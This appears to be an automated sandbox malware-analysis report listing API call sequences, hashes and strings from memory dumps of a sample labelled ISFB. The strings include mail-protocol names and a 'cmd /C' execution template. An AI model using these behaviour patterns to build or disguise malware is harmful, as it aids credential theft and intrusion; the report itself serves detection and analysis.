                      • API ID: Heap$Free$Allocate$Trimlstrlenmemcpy$Close$CountCriticalErrorLastSectionTickwsprintf$CallEnterHandleLeaveNamedPipeQueryValue_struprmemset
                      • String ID:
                      • API String ID: 100172519-0
                      • Opcode ID: 7512c2d19963d436b0948e55ab050ca68730d02a5e4bf6a3b71a0f0d4fd67bcf
                      • Instruction ID: 45147f6315eb10990822008cd615bd2423abe32eadcd574811c2a6ebd6d42630
                      • Opcode Fuzzy Hash: 7512c2d19963d436b0948e55ab050ca68730d02a5e4bf6a3b71a0f0d4fd67bcf
                      • Instruction Fuzzy Hash: 94715D72900219FFDB22EF94DC85DAEBB7DFB05340F11446AF605A2250D7795E41EBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0037159D
                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00372E03,00000094,?), ref: 003715AF
                      • StrChrA.SHLWAPI(00000000,0000003A), ref: 003715BC
                      • wsprintfA.USER32 ref: 003715D0
                      • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 003715E6
                      • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000,?,?,?), ref: 003715FF
                      • WriteFile.KERNEL32(00000000,00000000,?,?,?), ref: 00371607
                      • GetLastError.KERNEL32(?,?,?), ref: 00371615
                      • CloseHandle.KERNEL32(00000000), ref: 0037161E
                        • Part of subcall function 0037154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0037155B
                        • Part of subcall function 0037154D: GetLastError.KERNEL32(?,00372DF9), ref: 00371572
                      • GetLastError.KERNEL32(?,00372E03,00000094,?), ref: 0037162F
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037163F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$FileHandleHeap$AdjustAllocateCloseCreateDirectoryFreeModulePrivilegeWindowsWritewsprintf
                      • String ID: L"7
                      • API String ID: 3494808489-2580434585
                      • Opcode ID: ea741f28b4cb6cad33c240615d0ebbc85b7a1427f0fcfda487263accfea20bf4
                      • Instruction ID: 534081c4e0796bf3de0d2828247900a3a9b401be0a3bf7c19b89a90a36b6c51a
                      • Opcode Fuzzy Hash: ea741f28b4cb6cad33c240615d0ebbc85b7a1427f0fcfda487263accfea20bf4
                      • Instruction Fuzzy Hash: 8E112B72109214BFE3332B28AC4DF7B3B6CDB467A5F044026FD4AD22D0EA5A0D0586B5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetTickCount.KERNEL32(00000000,00000000,00000000,L"7,00372CFD,00000000), ref: 003775F0
                      • CreateFileW.KERNEL32(00000000,80000000,00000003,0039D2D8,00000003,00000000,00000000), ref: 0037760D
                      • GetLastError.KERNEL32 ref: 003776AE
                        • Part of subcall function 00388619: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,0039D270,00000000), ref: 0038864F
                        • Part of subcall function 00388619: lstrcpy.KERNEL32(00000000,00000000), ref: 00388673
                        • Part of subcall function 00388619: lstrcat.KERNEL32(00000000,00000000), ref: 0038867B
                      • GetFileSize.KERNEL32(?,00000000,Local\,00000001), ref: 00377639
                      • CreateFileMappingA.KERNEL32(00000000,0039D2D8,00000002,00000000,00000000,?), ref: 0037764D
                      • lstrlen.KERNEL32(?), ref: 00377669
                      • lstrcpy.KERNEL32(?,?), ref: 00377679
                      • GetLastError.KERNEL32 ref: 00377681
                      • HeapFree.KERNEL32(00000000,?), ref: 00377694
                      • CloseHandle.KERNEL32(?), ref: 003776A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                      • String ID: L"7$Local\
                      • API String ID: 194907169-3608840339
                      • Opcode ID: 214ef461ebdcfa241091ce892aa24b64a4aa028c9f6fd470f55edf1144119082
                      • Instruction ID: 9bb63e26567384656c4950e01c93a6b9bccf6827b0cf4f42a01e171a7dd6310c
                      • Opcode Fuzzy Hash: 214ef461ebdcfa241091ce892aa24b64a4aa028c9f6fd470f55edf1144119082
                      • Instruction Fuzzy Hash: DE215EB1904208FFDB129FA5DC89A9DBFB9FB04354F10846AF909E22A0D7768E54DF50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 003717AC
                      • CloseHandle.KERNEL32(0039D198), ref: 0037180D
                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 0037181A
                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00371824
                      • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 00371881
                      • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 003718A0
                      • SuspendThread.KERNEL32(00000000), ref: 003718AE
                      • CreateEventA.KERNEL32(0039D2D8,00000001,00000000), ref: 003718C2
                      • SetEvent.KERNEL32(00000000), ref: 003718CF
                      • CloseHandle.KERNEL32(00000000), ref: 003718D6
                      • Sleep.KERNEL32(000001F4), ref: 003718E9
                      • ResumeThread.KERNEL32(00000000), ref: 0037190D
                        • Part of subcall function 00389EF2: RegCloseKey.ADVAPI32(?,00000000), ref: 00389F79
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Close$EventHandleThread$CreateDeleteErrorFileLastOpenResumeSleepSuspend
                      • String ID:
                      • API String ID: 3029877175-0
                      • Opcode ID: 4c5c9f715fe44c60572f330b0e507d719b7e9a06bcadae7da1a2b828a3163481
                      • Instruction ID: 9307fea1b4e5bd20d128f28515eb79e3e2d94c3412c05e27520e620bd3e60f13
                      • Opcode Fuzzy Hash: 4c5c9f715fe44c60572f330b0e507d719b7e9a06bcadae7da1a2b828a3163481
                      • Instruction Fuzzy Hash: F8411B76910104FFCB23AFA9EC89DAE7FBDEB49704F108457F505A2260D7364950DB51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlImageNtHeader.NTDLL ref: 00371A4C
                      • GetCurrentThreadId.KERNEL32 ref: 00371A62
                      • GetCurrentThread.KERNEL32 ref: 00371A73
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 0037196A: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 003719D5
                        • Part of subcall function 0037196A: HeapFree.KERNEL32(00000000,00000000), ref: 003719FD
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 00371AE7
                      • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 00371AF7
                      • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00371B43
                      • wsprintfA.USER32 ref: 00371B54
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00371B5F
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00371B79
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Freememcpy$CurrentThreadlstrlen$AllocateErrorFileTime$CallCloseHandleHeaderImageLastNameNamedPipeSectionStatusSystemTempUnmapViewlstrcpymemsetwsprintf
                      • String ID: W
                      • API String ID: 2926878643-655174618
                      • Opcode ID: 550075644c30437890b8fe01ec3922b0f2ec74d3273d799fb16b26c03a585c5d
                      • Instruction ID: 75436c3f2ed87080e6dfbd7900745c08bf8a6d39e38e8ca49b652d5a66f55897
                      • Opcode Fuzzy Hash: 550075644c30437890b8fe01ec3922b0f2ec74d3273d799fb16b26c03a585c5d
                      • Instruction Fuzzy Hash: 3E418E32900204EFCB33AFA8DC45DAE7BB9FF45740F10851AF44996260E7799955CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(00000000), ref: 0037B8E1
                      • RtlAllocateHeap.NTDLL(00000000,0039CCCA), ref: 0037B8F7
                      • memcpy.NTDLL(00000000,00000000,0039CCC8), ref: 0037B90A
                      • _wcsupr.NTDLL ref: 0037B916
                      • lstrlenW.KERNEL32(?,0039CCC8), ref: 0037B948
                      • RtlAllocateHeap.NTDLL(00000000,?,0039CCC8), ref: 0037B95D
                      • lstrcpyW.KERNEL32(00000000,?), ref: 0037B973
                      • lstrcatW.KERNEL32(00000000,0039E910), ref: 0037B992
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037B9A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Allocatelstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                      • String ID: R9
                      • API String ID: 632491215-134138977
                      • Opcode ID: c13db48be299f273df259752f53daf2ae0892619e2335b26b9c69a375c40df70
                      • Instruction ID: 4fdb1b9c32e6f617e4c690ba2bc037fb07b71eac824b6c6351de7e99859bc173
                      • Opcode Fuzzy Hash: c13db48be299f273df259752f53daf2ae0892619e2335b26b9c69a375c40df70
                      • Instruction Fuzzy Hash: ED31B332514204ABC6336F74AC88B2BBABCEF8A711F16451AF659D3291DB7A9C018751
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00632DAA
                      • CoInitializeEx.OLE32(00000000,00000002), ref: 00632DB5
                      • PathFindExtensionW.SHLWAPI(00000000), ref: 00632DD0
                      • lstrcpyW.KERNEL32(00000000,00638224), ref: 00632DE5
                      • lstrlen.KERNEL32(00637614,?,?,?,?,?,?,?,?,?,?,00631853,?), ref: 00632E02
                      • lstrcpyW.KERNEL32(00000000,006384B8), ref: 00632E33
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • wsprintfW.USER32 ref: 00632E6A
                      • ShellExecuteExW.SHELL32(0000003C), ref: 00632E9F
                      • CoUninitialize.OLE32 ref: 00632EB3
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrcpy$AllocateExecuteExtensionFindFreeInitializePathShellUninitializelstrlenmemsetwsprintf
                      • String ID: <
                      • API String ID: 3500879692-4251816714
                      • Opcode ID: 773376d0db0983aa7065ecf1a2a17dc0e7bf2de445a317b159542f31452fd7b1
                      • Instruction ID: f766e71c42e016c8e4ed94055aa5fcc7469c1c92cc71f4454d1b9e3f67e3d49f
                      • Opcode Fuzzy Hash: 773376d0db0983aa7065ecf1a2a17dc0e7bf2de445a317b159542f31452fd7b1
                      • Instruction Fuzzy Hash: 7E3161B2D00225BBCB51ABA5DC49DDFBAAEEF45750F059115FA01A7212DB74CE00CBE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00377501: memset.NTDLL ref: 00377523
                        • Part of subcall function 00377501: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00377567
                        • Part of subcall function 00377501: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 003775AD
                        • Part of subcall function 00377501: CloseHandle.KERNEL32(?), ref: 003775D0
                      • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 00374F6B
                      • CloseHandle.KERNEL32(?), ref: 00374F77
                      • lstrlenW.KERNEL32(00000000), ref: 00374F90
                      • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00374FA1
                      • wcstombs.NTDLL ref: 00374FB0
                      • lstrlen.KERNEL32(?), ref: 00374FBD
                        • Part of subcall function 003895E5: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,00374FCF), ref: 003895F5
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F1E9
                        • Part of subcall function 0038F08B: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038F222
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F285
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F30A
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,0039D478), ref: 0038F355
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,0039F27A), ref: 0038F368
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F377
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?), ref: 0038F38D
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000), ref: 0038F39C
                      • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000000,00000001), ref: 00374FF2
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00375005
                      • DeleteFileW.KERNEL32(?), ref: 00375012
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Filelstrlen$CloseCriticalHandleLeaveSectionView$AllocateDeleteMappingOpenTrimUnmapmemsetwcstombs
                      • String ID: R9
                      • API String ID: 2164891022-134138977
                      • Opcode ID: 224f82273cc2d7f69fc0291e455ac241b668716dcfb636be7fde591fffcd7b9c
                      • Instruction ID: c262e63a58cce88a876c4c293e540d1546b8143adeb7b46bac919432e0f1f110
                      • Opcode Fuzzy Hash: 224f82273cc2d7f69fc0291e455ac241b668716dcfb636be7fde591fffcd7b9c
                      • Instruction Fuzzy Hash: 8B315A35910209BFCB23AFA5EC49E9F7B7DEF45350F004066F905A22A0DB768E11DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038B67D
                      • memcpy.NTDLL(?,?,00000010), ref: 0038B6A0
                      • memset.NTDLL ref: 0038B6EC
                      • lstrcpyn.KERNEL32(?,?,00000034), ref: 0038B700
                      • GetLastError.KERNEL32 ref: 0038B72E
                      • GetLastError.KERNEL32 ref: 0038B771
                        • Part of subcall function 0038B129: InterlockedExchange.KERNEL32(003713EB,000000FF), ref: 0038B130
                      • GetLastError.KERNEL32 ref: 0038B790
                      • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0038B7CA
                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 0038B7D8
                        • Part of subcall function 0038B51F: memset.NTDLL ref: 0038B567
                        • Part of subcall function 0038B51F: QueueUserWorkItem.KERNEL32(0038B193,?,00000010), ref: 0038B608
                        • Part of subcall function 0038B51F: GetLastError.KERNEL32 ref: 0038B612
                      • GetLastError.KERNEL32 ref: 0038B84D
                      • ReleaseMutex.KERNEL32(?), ref: 0038B85F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$ObjectSingleWait$memset$ExchangeInterlockedItemMutexQueueReleaseUserWorklstrcpynmemcpy
                      • String ID:
                      • API String ID: 2183084010-0
                      • Opcode ID: aed2db9a5589cab71c032c54efb676566b732152b47afddf5246612e755844cd
                      • Instruction ID: eecfdf4d8d6b4a18fb02cc81a96cfac51b430dcddce6d554ca3dbd4ea5b69b93
                      • Opcode Fuzzy Hash: aed2db9a5589cab71c032c54efb676566b732152b47afddf5246612e755844cd
                      • Instruction Fuzzy Hash: C5616E71914302AFD722AF359C49A1BF7ECBF84721F01896EF596C6690D771E8048F52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrcpyW.KERNEL32(00000000,0039F570), ref: 00390A29
                      • lstrcatW.KERNEL32(00000000,00000000), ref: 00390A31
                      • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 00390ACF
                      • LocalFree.KERNEL32(?,00000006), ref: 00390AE8
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                        • Part of subcall function 00389574: lstrlenW.KERNEL32(00000000,00000000,[9), ref: 00389584
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$AllocateLocallstrcatlstrcpylstrlenmemcpy
                      • String ID: IMAP$P$POP3$SMTP$[9
                      • API String ID: 2312297199-107704286
                      • Opcode ID: 570b29d322f12222777384634be917ea122517318a582e7d5afe1ac0af234675
                      • Instruction ID: c35ae2d7863a8aaba2d2f0c5928d0f500d6a8e804c1b3dc1bd69622a9dc3390d
                      • Opcode Fuzzy Hash: 570b29d322f12222777384634be917ea122517318a582e7d5afe1ac0af234675
                      • Instruction Fuzzy Hash: 82517C7290030AAFCF27AFA8CC899AFBBB9EF48300F154426F511F6151DB758951CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrcpy.KERNEL32(00000000,?), ref: 00371046
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00371115
                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00371145
                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0037115E
                      • CloseHandle.KERNEL32(00000000), ref: 00371168
                      • HeapFree.KERNEL32(00000000,?), ref: 00371178
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371193
                      • HeapFree.KERNEL32(00000000,?), ref: 003711A3
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$File$AllocateCloseCreateHandleWritelstrcpy
                      • String ID: ISFB
                      • API String ID: 1002670662-2538836093
                      • Opcode ID: 63de142562554913c326692e08b602f9a243245851afe457819efc07a03ab890
                      • Instruction ID: d54657128a45c8f2471aabb0f9ee9471c592d1c4619393b7e6174fbc3c2926c1
                      • Opcode Fuzzy Hash: 63de142562554913c326692e08b602f9a243245851afe457819efc07a03ab890
                      • Instruction Fuzzy Hash: 09516076800118BFDB13AFA4DC84CAE7BBDEF08354F118466FA05A7260D6368E459FA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 003776D9
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • lstrlenW.KERNEL32(00000000,00000000,00000000,0039CD50,00000000,cmd /C "%s> %s1"), ref: 00377712
                      • wcstombs.NTDLL ref: 0037771C
                      • CreateProcessA.KERNEL32(00000000,00377AD2,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 00377750
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00377771
                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0037778E
                      • GetLastError.KERNEL32 ref: 003777A6
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Processlstrlen$CodeCreateErrorExitFreeHeapLastMultipleObjectsWaitmemsetwcstombs
                      • String ID: D$cmd /C "%s> %s1"
                      • API String ID: 3593641235-2226621151
                      • Opcode ID: 7099b8c17bd13537b713856f48224bace0bc0b58c244b39de51f6c1c6155f6af
                      • Instruction ID: a4e29ecbb16ca1ac81311b5f677c1bdf7797527f77ca950da023e8335df002ab
                      • Opcode Fuzzy Hash: 7099b8c17bd13537b713856f48224bace0bc0b58c244b39de51f6c1c6155f6af
                      • Instruction Fuzzy Hash: B9313872D05268AFCB22AFA5CC859FFBFBCEB09750F108026F505B6250D7354A41CBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038E971: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E98D
                        • Part of subcall function 0038E971: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E9AB
                      • GetTickCount.KERNEL32 ref: 0038EF1E
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EC4C: strcpy.NTDLL ref: 0038EC8A
                        • Part of subcall function 0038EC4C: lstrcat.KERNEL32(00000000,?), ref: 0038EC95
                        • Part of subcall function 0038EC4C: StrTrimA.SHLWAPI(00000000,003994B4), ref: 0038ECB2
                      • StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 00389722: lstrcpy.KERNEL32(00000000,?), ref: 0038974D
                        • Part of subcall function 00389722: lstrcat.KERNEL32(00000000,?), ref: 00389758
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                      • HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$FreeHeap$EnterLeave$CountTickTrimlstrcat$Sleeplstrcpystrcpy
                      • String ID:
                      • API String ID: 3039249099-0
                      • Opcode ID: 0b3783c9d4764c75c5fece900aaad226e962820b4172d63bbbc74b14a9529959
                      • Instruction ID: 4e0d71901a89a726d7ccc96798f3c4fe18cdf78e1a74d6829c8f6c62057505e5
                      • Opcode Fuzzy Hash: 0b3783c9d4764c75c5fece900aaad226e962820b4172d63bbbc74b14a9529959
                      • Instruction Fuzzy Hash: B77149B2600204FFDB13AFA9EC46E5A3BADFB48310F154462F914D62A1DB36E950DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373907
                      • RtlAllocateHeap.NTDLL(00000000,00010000,0039E1D3), ref: 00373925
                      • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 00373954
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32 ref: 0038EF1E
                        • Part of subcall function 0038EDFA: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                        • Part of subcall function 0038EDFA: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EDFA: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      • HeapFree.KERNEL32(00000000,00000000,0000011B), ref: 003739BE
                        • Part of subcall function 0038EDBB: memcpy.NTDLL(0037D7B1,0037D7B1,00000000,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001,00000000,0039E1C6,0037D7B1,00000000), ref: 0038EDDE
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00373B3E
                        • Part of subcall function 00389B83: memset.NTDLL ref: 00389BB1
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,003973F4), ref: 00389C12
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389C31
                        • Part of subcall function 00389B83: _strupr.NTDLL ref: 00389C38
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,?), ref: 00389C45
                        • Part of subcall function 00389B83: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00389C8D
                        • Part of subcall function 00389B83: lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00389CAC
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373B2E
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      • RtlAllocateHeap.NTDLL(00000000,00000400,0039E1D3), ref: 00373A83
                      • wsprintfA.USER32 ref: 00373A97
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373AA2
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373B14
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
